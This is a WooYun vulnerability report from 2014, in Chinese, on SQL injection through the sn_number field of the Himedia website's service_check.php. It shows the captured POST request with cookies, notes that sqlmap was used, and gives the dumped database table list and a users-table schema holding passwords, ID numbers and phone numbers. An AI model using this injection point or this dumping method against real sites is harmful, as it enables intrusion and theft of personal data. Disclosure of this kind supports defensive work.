当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-056592

漏洞标题:海美迪公司存在sql注入漏洞

相关厂商:海美迪

漏洞作者: bitcoin

提交时间:2014-04-13 17:54

修复时间:2014-05-28 17:55

公开时间:2014-05-28 17:55

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-05-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

海美迪公司是一家专注于家庭影视屏幕娱乐的创业公司,一个具有视界终极想象力的资深团队。成立于2005年12月的深圳市海美迪科技有限公司,是一家专门从事多媒体应用开发的高新技术企业,主营产品包括智能网络机顶盒、IPTV机顶盒、OTT、高清硬盘播放机、高清电视机顶盒等,全球首款安卓网络机顶盒缔造者,中国智能网络机顶盒领导品牌。

详细说明:

注入页面:
http://www.himedia-tech.cn
在输入您的产品序列号时,对参数sn_number过滤不严,导致注入。
输入2222222222222,然后抓包
POST /service_check.php HTTP/1.1
Host: www.himedia-tech.cn
Proxy-Connection: keep-alive
Content-Length: 46
Cache-Control: max-age=0
Origin: http://www.himedia-tech.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.himedia-tech.cn/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: fang_sid=9237b8a132abc6275244778806561130; fang_lastvisit=1397135928; fang_userid=0; logtime=Yes; PHPSESSID=u7mjarsnm44ut37ng4akgrl1p5; SERVERID=9316eca6cad89c9e6735c89b31207174|1397135969|1397135928; Hm_lvt_866a4f0d3561bdee99db9ce30c05b85a=1397135937; Hm_lpvt_866a4f0d3561bdee99db9ce30c05b85a=1397135987; CNZZDATA2373077=cnzz_eid%3D633860561-1397135930-%26ntime%3D1397135930%26cnzz_a%3D4%26sin%3Dnone%26ltime%3D1397135937661
sn_number=2222222222222&cap_code=1092&x=25&y=4
运行sqlmap,

1.jpg


2.jpg


Database: hmd
[60 tables]
+-----------------------------+
| agent |
| bid |
| center_type |
| content_type |
| emlog_attachment |
| emlog_blog |
| emlog_comment |
| emlog_link |
| emlog_options |
| emlog_reply |
| emlog_sort |
| emlog_tag |
| emlog_trackback |
| emlog_twitter |
| emlog_user |
| file |
| goods |
| goods_firmware |
| goodstype |
| help |
| help_class |
| help_message |
| images |
| jiameng |
| kfm_new_directories |
| kfm_new_files |
| kfm_new_files_images |
| kfm_new_files_images_thumbs |
| kfm_new_parameters |
| kfm_new_plugin_extensions |
| kfm_new_session |
| kfm_new_session_vars |
| kfm_new_settings |
| kfm_new_tagged_files |
| kfm_new_tags |
| kfm_new_translations |
| kfm_new_users |
| product_query |
| sessions |
| sessionvars |
| share_project |
| share_project_type |
| site_msg |
| site_settings |
| users |
| wp_commentmeta |
| wp_comments |
| wp_in_series_3_0_11_auth |
| wp_in_series_3_0_11_entries |
| wp_in_series_3_0_11_series |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_relatedposts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------------+
Database: hmd
Table: users
[62 columns]
+---------------------------+---------------+
| Column | Type |
+---------------------------+---------------+
| admin_deny | mediumint(8) |
| admin_good | mediumint(8) |
| bid_current_id | int(11) |
| buy_files | mediumint(10) |
| customer_group_permission | text |
| document_box_files | mediumint(8) |
| document_request | mediumint(8) |
| download_files | mediumint(8) |
| download_files_able | mediumint(8) |
| english | smallint(1) |
| favorite_files | mediumint(8) |
| income_account | decimal(10,2) |
| level_in_company | smallint(1) |
| login_times | mediumint(8) |
| out_account | decimal(10,2) |
| permission | varchar(255) |
| point | decimal(10,2) |
| question_answered | int(5) |
| sell_files | mediumint(8) |
| upload_files | mediumint(8) |
| upload_passed_files | mediumint(8) |
| upload_unpassed_files | mediumint(8) |
| upload_waiting_files | mediumint(8) |
| user_allowemails | tinyint(1) |
| user_answer | varchar(255) |
| user_career | varchar(6) |
| user_company | varchar(255) |
| user_department | varchar(20) |
| user_email | varchar(255) |
| user_emailshow | tinyint(1) |
| user_entrance_date | varchar(4) |
| user_extension | varchar(6) |
| user_homepage | varchar(255) |
| user_id | mediumint(8) |
| user_idcard | varchar(18) |
| user_intro | text |
| user_introshow | tinyint(1) |
| user_invisible | tinyint(1) |
| user_joindate | int(11) |
| user_lastaction | int(11) |
| user_lastvisit | int(11) |
| user_level | smallint(6) |
| user_location | varchar(255) |
| user_mobile | varchar(20) |
| user_msn | varchar(60) |
| user_name | varchar(30) |
| user_password | varchar(255) |
| user_pdshow | tinyint(1) |
| user_photo | varchar(255) |
| user_province | varchar(6) |
| user_qq | varchar(15) |
| user_question | varchar(255) |
| user_recommend | char(1) |
| user_scshow | tinyint(1) |
| user_sex | tinyint(1) |
| user_sexshow | tinyint(1) |
| user_state | char(1) |
| user_telephone | varchar(13) |
| user_title | varchar(8) |
| user_truename | varchar(10) |
| user_truenameshow | tinyint(1) |
| user_type | char(1) |
+---------------------------+---------------+

5.jpg


在这个表中,得到了包括admin在内的20个用户的密码信息,这里就不爆破了!

漏洞证明:

如上

修复方案:

过滤,有礼物不?

版权声明:转载请注明来源 bitcoin@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝